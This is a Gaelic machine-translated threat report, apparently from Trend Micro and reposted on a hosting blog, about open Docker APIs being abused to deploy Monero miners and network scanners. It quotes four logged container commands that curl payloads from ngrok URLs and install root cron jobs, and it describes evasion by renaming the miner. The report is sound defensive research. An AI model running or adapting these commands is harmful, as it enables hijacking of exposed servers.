ProHoster > Blog > Rianachd > Mar a tha an API Docker neo-shealbhach agus Ïomhaighean poblach bhon choimhearsnachd gan cleachdadh gus mèinnearan cryptocurrency a sgaoileadh

Mar a tha an API Docker neo-shealbhach agus Ïomhaighean poblach bhon choimhearsnachd gan cleachdadh gus mèinnearan cryptocurrency a sgaoileadh

Mar a tha an API Docker neo-shealbhach agus Ïomhaighean poblach bhon choimhearsnachd gan cleachdadh gus mèinnearan cryptocurrency a sgaoileadh

Rinn sinn mion-sgrùdadh air an dàta a chaidh a chruinneachadh le bhith a’ cleachdadh soithichean meala, a chruthaich sinn gus sùil a chumail air bagairtean. Agus lorg sinn gnìomhachd cudromach bho mhèinnearan cryptocurrency gun iarraidh no gun chead air an cleachdadh mar shoithichean meallta a’ cleachdadh ìomhaigh foillsichte leis a’ choimhearsnachd air Docker Hub. Tha an ìomhaigh air a chleachdadh mar phàirt de sheirbheis a 'lìbhrigeadh mèinnearan cryptocurrency droch-rùnach.

A bharrachd air an sin, tha prògraman airson a bhith ag obair le lÏonraidhean air an cur a-steach gus a dhol a-steach do shoithichean is thagraidhean faisg air làimh.

Bidh sinn a’ fàgail na poitean meala againn mar a tha, is e sin, le roghainnean bunaiteach, às aonais ceumannan tèarainteachd no stàladh bathar-bog a bharrachd às deidh sin. Thoir an aire gu bheil molaidhean aig Docker airson stèidheachadh tùsail gus mearachdan agus so-leòntachd sìmplidh a sheachnadh. Ach is e soithichean a th’ anns na poitean meala a thathas a’ cleachdadh gus ionnsaighean a lorg a tha ag amas air an àrd-ùrlar containerization, chan e na tagraidhean taobh a-staigh na soithichean.

Tha an gnìomhachd droch-rùnach a chaidh a lorg cuideachd sònraichte leis nach eil feum air so-leòntachd agus tha e cuideachd neo-eisimeileach bhon dreach Docker. Is e a bhith a’ lorg ìomhaigh container a tha air a rèiteachadh gu ceàrr, agus mar sin fosgailte, a h-uile rud a dh’ fheumas luchd-ionnsaigh gus mòran de luchd-frithealaidh fosgailte a ghlacadh.

Leigidh an API Docker nach deach a dhùnadh leis an neach-cleachdaidh raon farsaing de sgiobaidhean, a’ toirt a-steach a bhith a’ faighinn liosta de shoithichean ruith, a’ faighinn logaichean bho shoitheach sònraichte, a’ tòiseachadh, a’ stad (a’ gabhail a-steach èignichte) agus eadhon a’ cruthachadh soitheach ùr bho ìomhaigh shònraichte le suidheachaidhean sònraichte.

Mar a tha an API Docker neo-shealbhach agus Ïomhaighean poblach bhon choimhearsnachd gan cleachdadh gus mèinnearan cryptocurrency a sgaoileadh
Air an taobh chlÏ tha an dòigh lÏbhrigidh malware. Air an làimh dheis tha àrainneachd an neach-ionnsaigh, a leigeas le Ïomhaighean a chuir a-mach aig astar.

Mar a tha an API Docker neo-shealbhach agus Ïomhaighean poblach bhon choimhearsnachd gan cleachdadh gus mèinnearan cryptocurrency a sgaoileadh
Sgaoileadh a rèir dÚthaich de 3762 fosgailte Docker APIs. Stèidhichte air sgrÚdadh Shodan leis an deit 12.02.2019/XNUMX/XNUMX

Slabhraidh ionnsaigh agus roghainnean pĂ ighidh pĂ ighidh

Chaidh gnìomhachd droch-rùnach a lorg chan ann a-mhàin le cuideachadh bho phoitean meala. Tha dàta bho Shodan a’ sealltainn gu bheil an àireamh de APIan Docker fosgailte (faic an dàrna graf) air a dhol suas bho rinn sinn sgrùdadh air inneal mì-chruthaichte a chaidh a chleachdadh mar dhrochaid gus bathar-bog mèinnearachd cryptocurrency Monero a chleachdadh. Anns an Dàmhair an-uiridh (2018, dàta làithreach faodaidh tu coimhead mar seo mu thuairmeas. eadar-theangair) cha robh ann ach 856 API fosgailte.

Sheall sgrùdadh air na logaichean meala gu robh cleachdadh ìomhaighean soithich cuideachd co-cheangailte ri cleachdadh gròc, inneal airson ceanglaichean tèarainte a stèidheachadh no trafaic a chuir air adhart bho phuingean a tha ruigsinneach don phoball gu seòlaidhean no goireasan sònraichte (mar eisimpleir localhost). Leigidh seo le luchd-ionnsaigh URLan a chruthachadh gu dinamach nuair a bhios iad a’ lìbhrigeadh uallach pàighidh gu frithealaiche fosgailte. Gu h-ìosal tha eisimpleirean còd bho na logaichean a’ sealltainn droch dhìol air seirbheis ngrok:

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Mar a chì thu, tha na faidhlichean a chaidh a luchdachadh sìos air an luchdachadh sìos bho URLan a tha ag atharrachadh gu cunbhalach. Tha ceann-latha crìochnachaidh goirid aig na URLan sin, agus mar sin chan urrainnear luchdan pàighidh a luchdachadh sìos às deidh a’ cheann-latha crìochnachaidh.

Tha dà roghainn luchd-pàighidh ann. Is e a’ chiad fhear mèinneadair co-chruinnichte ann an cruth ELF airson Linux (air a chomharrachadh mar Coinminer.SH.MALXMR.ATNO), a tha a’ ceangal ris an amar mèinnearachd. Is e an dàrna fear sgriobt (TrojanSpy.SH.ZNETMAP.A), a chaidh a dhealbhadh gus innealan lìonra sònraichte fhaighinn a thathas a’ cleachdadh gus raointean lìonra a sganadh agus an uairsin targaidean ùra a lorg.

Tha an sgriobt dropper a 'suidheachadh dà caochladairean, a tha an uair sin a chleachdadh airson a' cleachdadh a 'mhèinnear cryptocurrency. Anns an caochladair HOST tha an URL far a bheil na faidhlichean droch-rÚnach suidhichte, agus is e an caochladair RIP an t-ainm faidhle (gu dearbh, an hash) den mhèinnear a thèid a chleachdadh. Bidh an caochladair HOST ag atharrachadh a h-uile uair a bhios an caochladair hash ag atharrachadh. Tha an sgriobt cuideachd a 'feuchainn ri dèanamh cinnteach nach eil mèinnearan cryptocurrency sam bith eile a' ruith air an fhrithealaiche ionnsaigh.

Mar a tha an API Docker neo-shealbhach agus Ïomhaighean poblach bhon choimhearsnachd gan cleachdadh gus mèinnearan cryptocurrency a sgaoileadh
Eisimpleirean de chaochladairean HOST agus RIP, a bharrachd air criomag còd a chaidh a chleachdadh gus dèanamh cinnteach nach eil mèinnearan eile a 'ruith

Mus tèid am mèinneadair a chur air bhog, thèid ath-ainmeachadh gu nginx. Bidh dreachan eile den sgriobt seo ag ath-ainmeachadh a’ mhèinneadair gu seirbheisean dligheach eile a dh’ fhaodadh a bhith an làthair san àrainneachd. LinuxMar as trice bidh seo gu leòr airson sgrùdaidhean a sheachnadh air an liosta de phròiseasan a tha a’ ruith.

Tha feartan aig an sgriobt sgrùdaidh cuideachd. Bidh e ag obair leis an aon sheirbheis URL gus na h-innealan riatanach a chleachdadh. Nam measg tha an binary zmap, a thathas a’ cleachdadh gus lìonraidhean a sganadh agus liosta de phuirt fhosgailte fhaighinn. Bidh an sgriobt cuideachd a’ luchdachadh dàna eile a thathas a’ cleachdadh gus eadar-obrachadh leis na seirbheisean a chaidh a lorg agus brataichean fhaighinn bhuapa gus fiosrachadh a bharrachd a dhearbhadh mun t-seirbheis a chaidh a lorg (mar eisimpleir, an dreach aige).

Bidh an sgriobt cuideachd a’ dearbhadh cuid de raointean lìonra ri sganadh, ach tha seo an urra ri dreach an sgriobt. Bidh e cuideachd a’ suidheachadh na puirt targaid bho na seirbheisean - sa chùis seo, Docker - mus ruith an scan.

Cho luath ‘s a lorgar targaidean a dh’fhaodadh a bhith ann, thèid brataichean a thoirt air falbh bhuapa gu fèin-ghluasadach. Bidh an sgriobt cuideachd a’ sìoladh thargaidean stèidhichte air na seirbheisean, na h-aplacaidean, na co-phàirtean no na h-àrd-ùrlaran anns a bheil ùidh aige: Redis, Jenkins, Drupal, MODX, Maighstir Kubernetes, neach-dèiligidh Docker 1.16 agus Apache CouchDB. Ma tha an frithealaiche a chaidh a sganadh a’ maidseadh gin dhiubh, thèid a shàbhaladh ann am faidhle teacsa, a dh’ fhaodas luchd-ionnsaigh a chleachdadh nas fhaide air adhart airson mion-sgrùdadh agus sgrùdadh às deidh sin. Thèid na faidhlichean teacsa seo a luchdachadh suas gu frithealaichean an luchd-ionnsaigh tro cheanglaichean fiùghantach. Is e sin, thèid URL fa leth a chleachdadh airson gach faidhle, a tha a 'ciallachadh gu bheil e doirbh faighinn a-steach às dèidh sin.

Is e ìomhaigh Docker a th’ anns an vectar ionnsaigh, mar a chithear san ath dhà phìos còd.

Mar a tha an API Docker neo-shealbhach agus Ïomhaighean poblach bhon choimhearsnachd gan cleachdadh gus mèinnearan cryptocurrency a sgaoileadh
Aig a 'mhullach tha ath-ainmeachadh gu seirbheis dhligheach, agus aig a' bhonn tha mar a thathar a 'cleachdadh zmap airson lĂŹonraidhean a sganadh

Mar a tha an API Docker neo-shealbhach agus Ïomhaighean poblach bhon choimhearsnachd gan cleachdadh gus mèinnearan cryptocurrency a sgaoileadh
Aig a’ mhullach tha raointean lìonra ro-mhìnichte, aig a’ bhonn tha puirt sònraichte airson seirbheisean a lorg, a’ gabhail a-steach Docker

Mar a tha an API Docker neo-shealbhach agus Ïomhaighean poblach bhon choimhearsnachd gan cleachdadh gus mèinnearan cryptocurrency a sgaoileadh
Tha an dealbh-sgrìn a’ sealltainn gun deach an ìomhaigh alpach-curl a luchdachadh sìos còrr air 10 millean uair

Stèidhichte air Alpach Linux agus faodar curl, inneal CLI a tha èifeachdach a thaobh ghoireasan airson faidhlichean a ghluasad thairis air diofar phròtacalan, a chur ri chèile Dealbh docker. Mar a chì thu san ìomhaigh roimhe, chaidh an ìomhaigh seo a luchdachadh sìos mu thràth còrr air 10 millean uair. Faodaidh àireamh mhòr de luchdachadh a-nuas a bhith a’ ciallachadh a bhith a’ cleachdadh an ìomhaigh seo mar àite inntrigidh; chaidh an ìomhaigh seo ùrachadh o chionn còrr is sia mìosan; cha do luchdaich luchd-cleachdaidh sìos ìomhaighean eile bhon stòr seo cho tric. Anns an Docker puing inntrigidh - seata de stiùiridhean air an cleachdadh gus soitheach a rèiteachadh airson a ruith. Ma tha roghainnean an àite inntrigidh ceàrr (mar eisimpleir, tha an soitheach air fhàgail fosgailte bhon eadar-lìn), faodar an ìomhaigh a chleachdadh mar vectar ionnsaigh. Faodaidh luchd-ionnsaigh a chleachdadh gus uallach pàighidh a lìbhrigeadh ma lorgas iad inneal mì-dhealbhaichte no fosgailte air fhàgail gun taic.

Tha e cudromach cuimhneachadh nach eil an ìomhaigh seo (alpach-curl) fhèin droch-rùnach, ach mar a chì thu gu h-àrd, faodar a chleachdadh gus gnìomhan droch-rùnach a choileanadh. Faodar ìomhaighean Docker coltach ris a chleachdadh cuideachd airson gnìomhan droch-rùnach a dhèanamh. Chuir sinn fios gu Docker agus dh’ obraich sinn leotha air a’ chùis seo.

molaidhean

Suidheachadh ceàrr fhàgail duilgheadas seasmhach airson mòran chompanaidhean, gu sònraichte an fheadhainn a tha a’ cur an gnìomh DevOps, le fòcas air leasachadh luath agus lìbhrigeadh. Tha a h-uile càil air a dhèanamh nas miosa leis an fheum air cumail ri riaghailtean sgrùdaidh is sgrùdaidh, an fheum air sùil a chumail air dìomhaireachd dàta, a bharrachd air a’ mhilleadh mòr bho neo-ghèilleadh. Le bhith a’ toirt a-steach fèin-ghluasad tèarainteachd a-steach don chuairt-beatha leasachaidh chan e a-mhàin gad chuideachadh gus tuill tèarainteachd a lorg a dh’ fhaodadh a dhol neo-aithnichte air dhòigh eile, ach cuidichidh e thu cuideachd gus eallach obrach neo-riatanach a lughdachadh, leithid ruith bathar-bog a bharrachd airson gach so-leòntachd no mì-dhealbhadh a lorgar às deidh tagradh a chuir a-steach.

Tha an tachartas air a bheilear a’ beachdachadh san artaigil seo a’ soilleireachadh an fheum air sàbhailteachd a ghabhail a-steach bhon toiseach, a’ toirt a-steach na molaidhean a leanas:

  • Airson rianadairean siostam agus luchd-leasachaidh: Thoir sĂšil an-còmhnaidh air na roghainnean API agad gus dèanamh cinnteach gu bheil a h-uile cĂ il air a rèiteachadh gus gabhail ri iarrtasan bho fhrithealaiche sònraichte no lĂŹonra a-staigh a-mhĂ in.
  • Lean am prionnsapal de chòraichean as lugha: dèan cinnteach gu bheil ĂŹomhaighean soidhnidh air an soidhnigeadh agus air an dearbhadh, cuingealaich ruigsinneachd gu pĂ irtean èiginneach (seirbheis cur air bhog container) agus cuir crioptachadh ri ceanglaichean lĂŹonra.
  • Lean molaidhean agus a’ comasachadh uidheamachdan tèarainteachd, m.e. bho Docker agus air a thogail a-steach feartan sĂ bhailteachd.
  • Cleachd sganadh fèin-ghluasadach de amannan ruith agus ĂŹomhaighean gus fiosrachadh a bharrachd fhaighinn mu na pròiseasan a tha a’ ruith anns a’ ghobhar (mar eisimpleir, gus spoofing a lorg no so-leòntachd a lorg). Bidh smachd tagraidh agus sgrĂšdadh ionracas a’ cuideachadh le bhith a’ lorg atharrachaidhean neo-Ă bhaisteach air frithealaichean, faidhlichean, agus raointean siostam.

Bidh Trendmicro a’ cuideachadh sgiobaidhean DevOps a bhith a’ togail gu tèarainte, gan sgaoileadh gu sgiobalta, agus a’ cur air bhog an àite sam bith. Trend Micro Tèarainteachd Cloud Hybrid A’ toirt seachad tèarainteachd chumhachdach, sgiobalta agus fèin-ghluasadach thairis air loidhne-phìoban DevOps na buidhne agus a’ toirt seachad iomadh dìon bho chunnart XGen gus eallach obrach corporra, brìgheil agus sgòthan a dhìon aig àm ruith. Bidh e cuideachd a’ cur tèarainteachd container le Tèarainteachd domhainn и Sgrùdadh Smart Security Deep, a bhios a’ sganadh ìomhaighean container Docker airson malware agus so-leòntachd aig àm sam bith san loidhne-phìoban leasachaidh gus casg a chuir air bagairtean mus tèid an cleachdadh.

Comharraidhean co-rèiteachaidh

hashes co-cheangailte:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

air a ' Docker cùrsa bhidio a Bidh luchd-labhairt gnìomhach a’ sealltainn dè na suidheachaidhean a dh’ fheumar a dhèanamh an-toiseach gus an coltas a lughdachadh no gus an suidheachadh a tha air a mhìneachadh gu h-àrd a sheachnadh. Agus air 19-21 Lùnastal aig dian air-loidhne Innealan DevOps & Cheats Faodaidh tu na duilgheadasan tèarainteachd sin agus an leithid a dheasbad le co-obraichean agus tidsearan gnìomhach aig bòrd cruinn, far am faod a h-uile duine bruidhinn a-mach agus èisteachd ri pianta agus soirbheachas co-obraichean eòlach.

Source: www.habr.com

Ceannaich aoigheachd earbsach airson làraich le dìon DDoS, frithealaichean VPS VDS 🔥 Ceannaich aoigheachd làrach-lìn earbsach le dìon DDoS, frithealaichean VPS VDS | ProHoster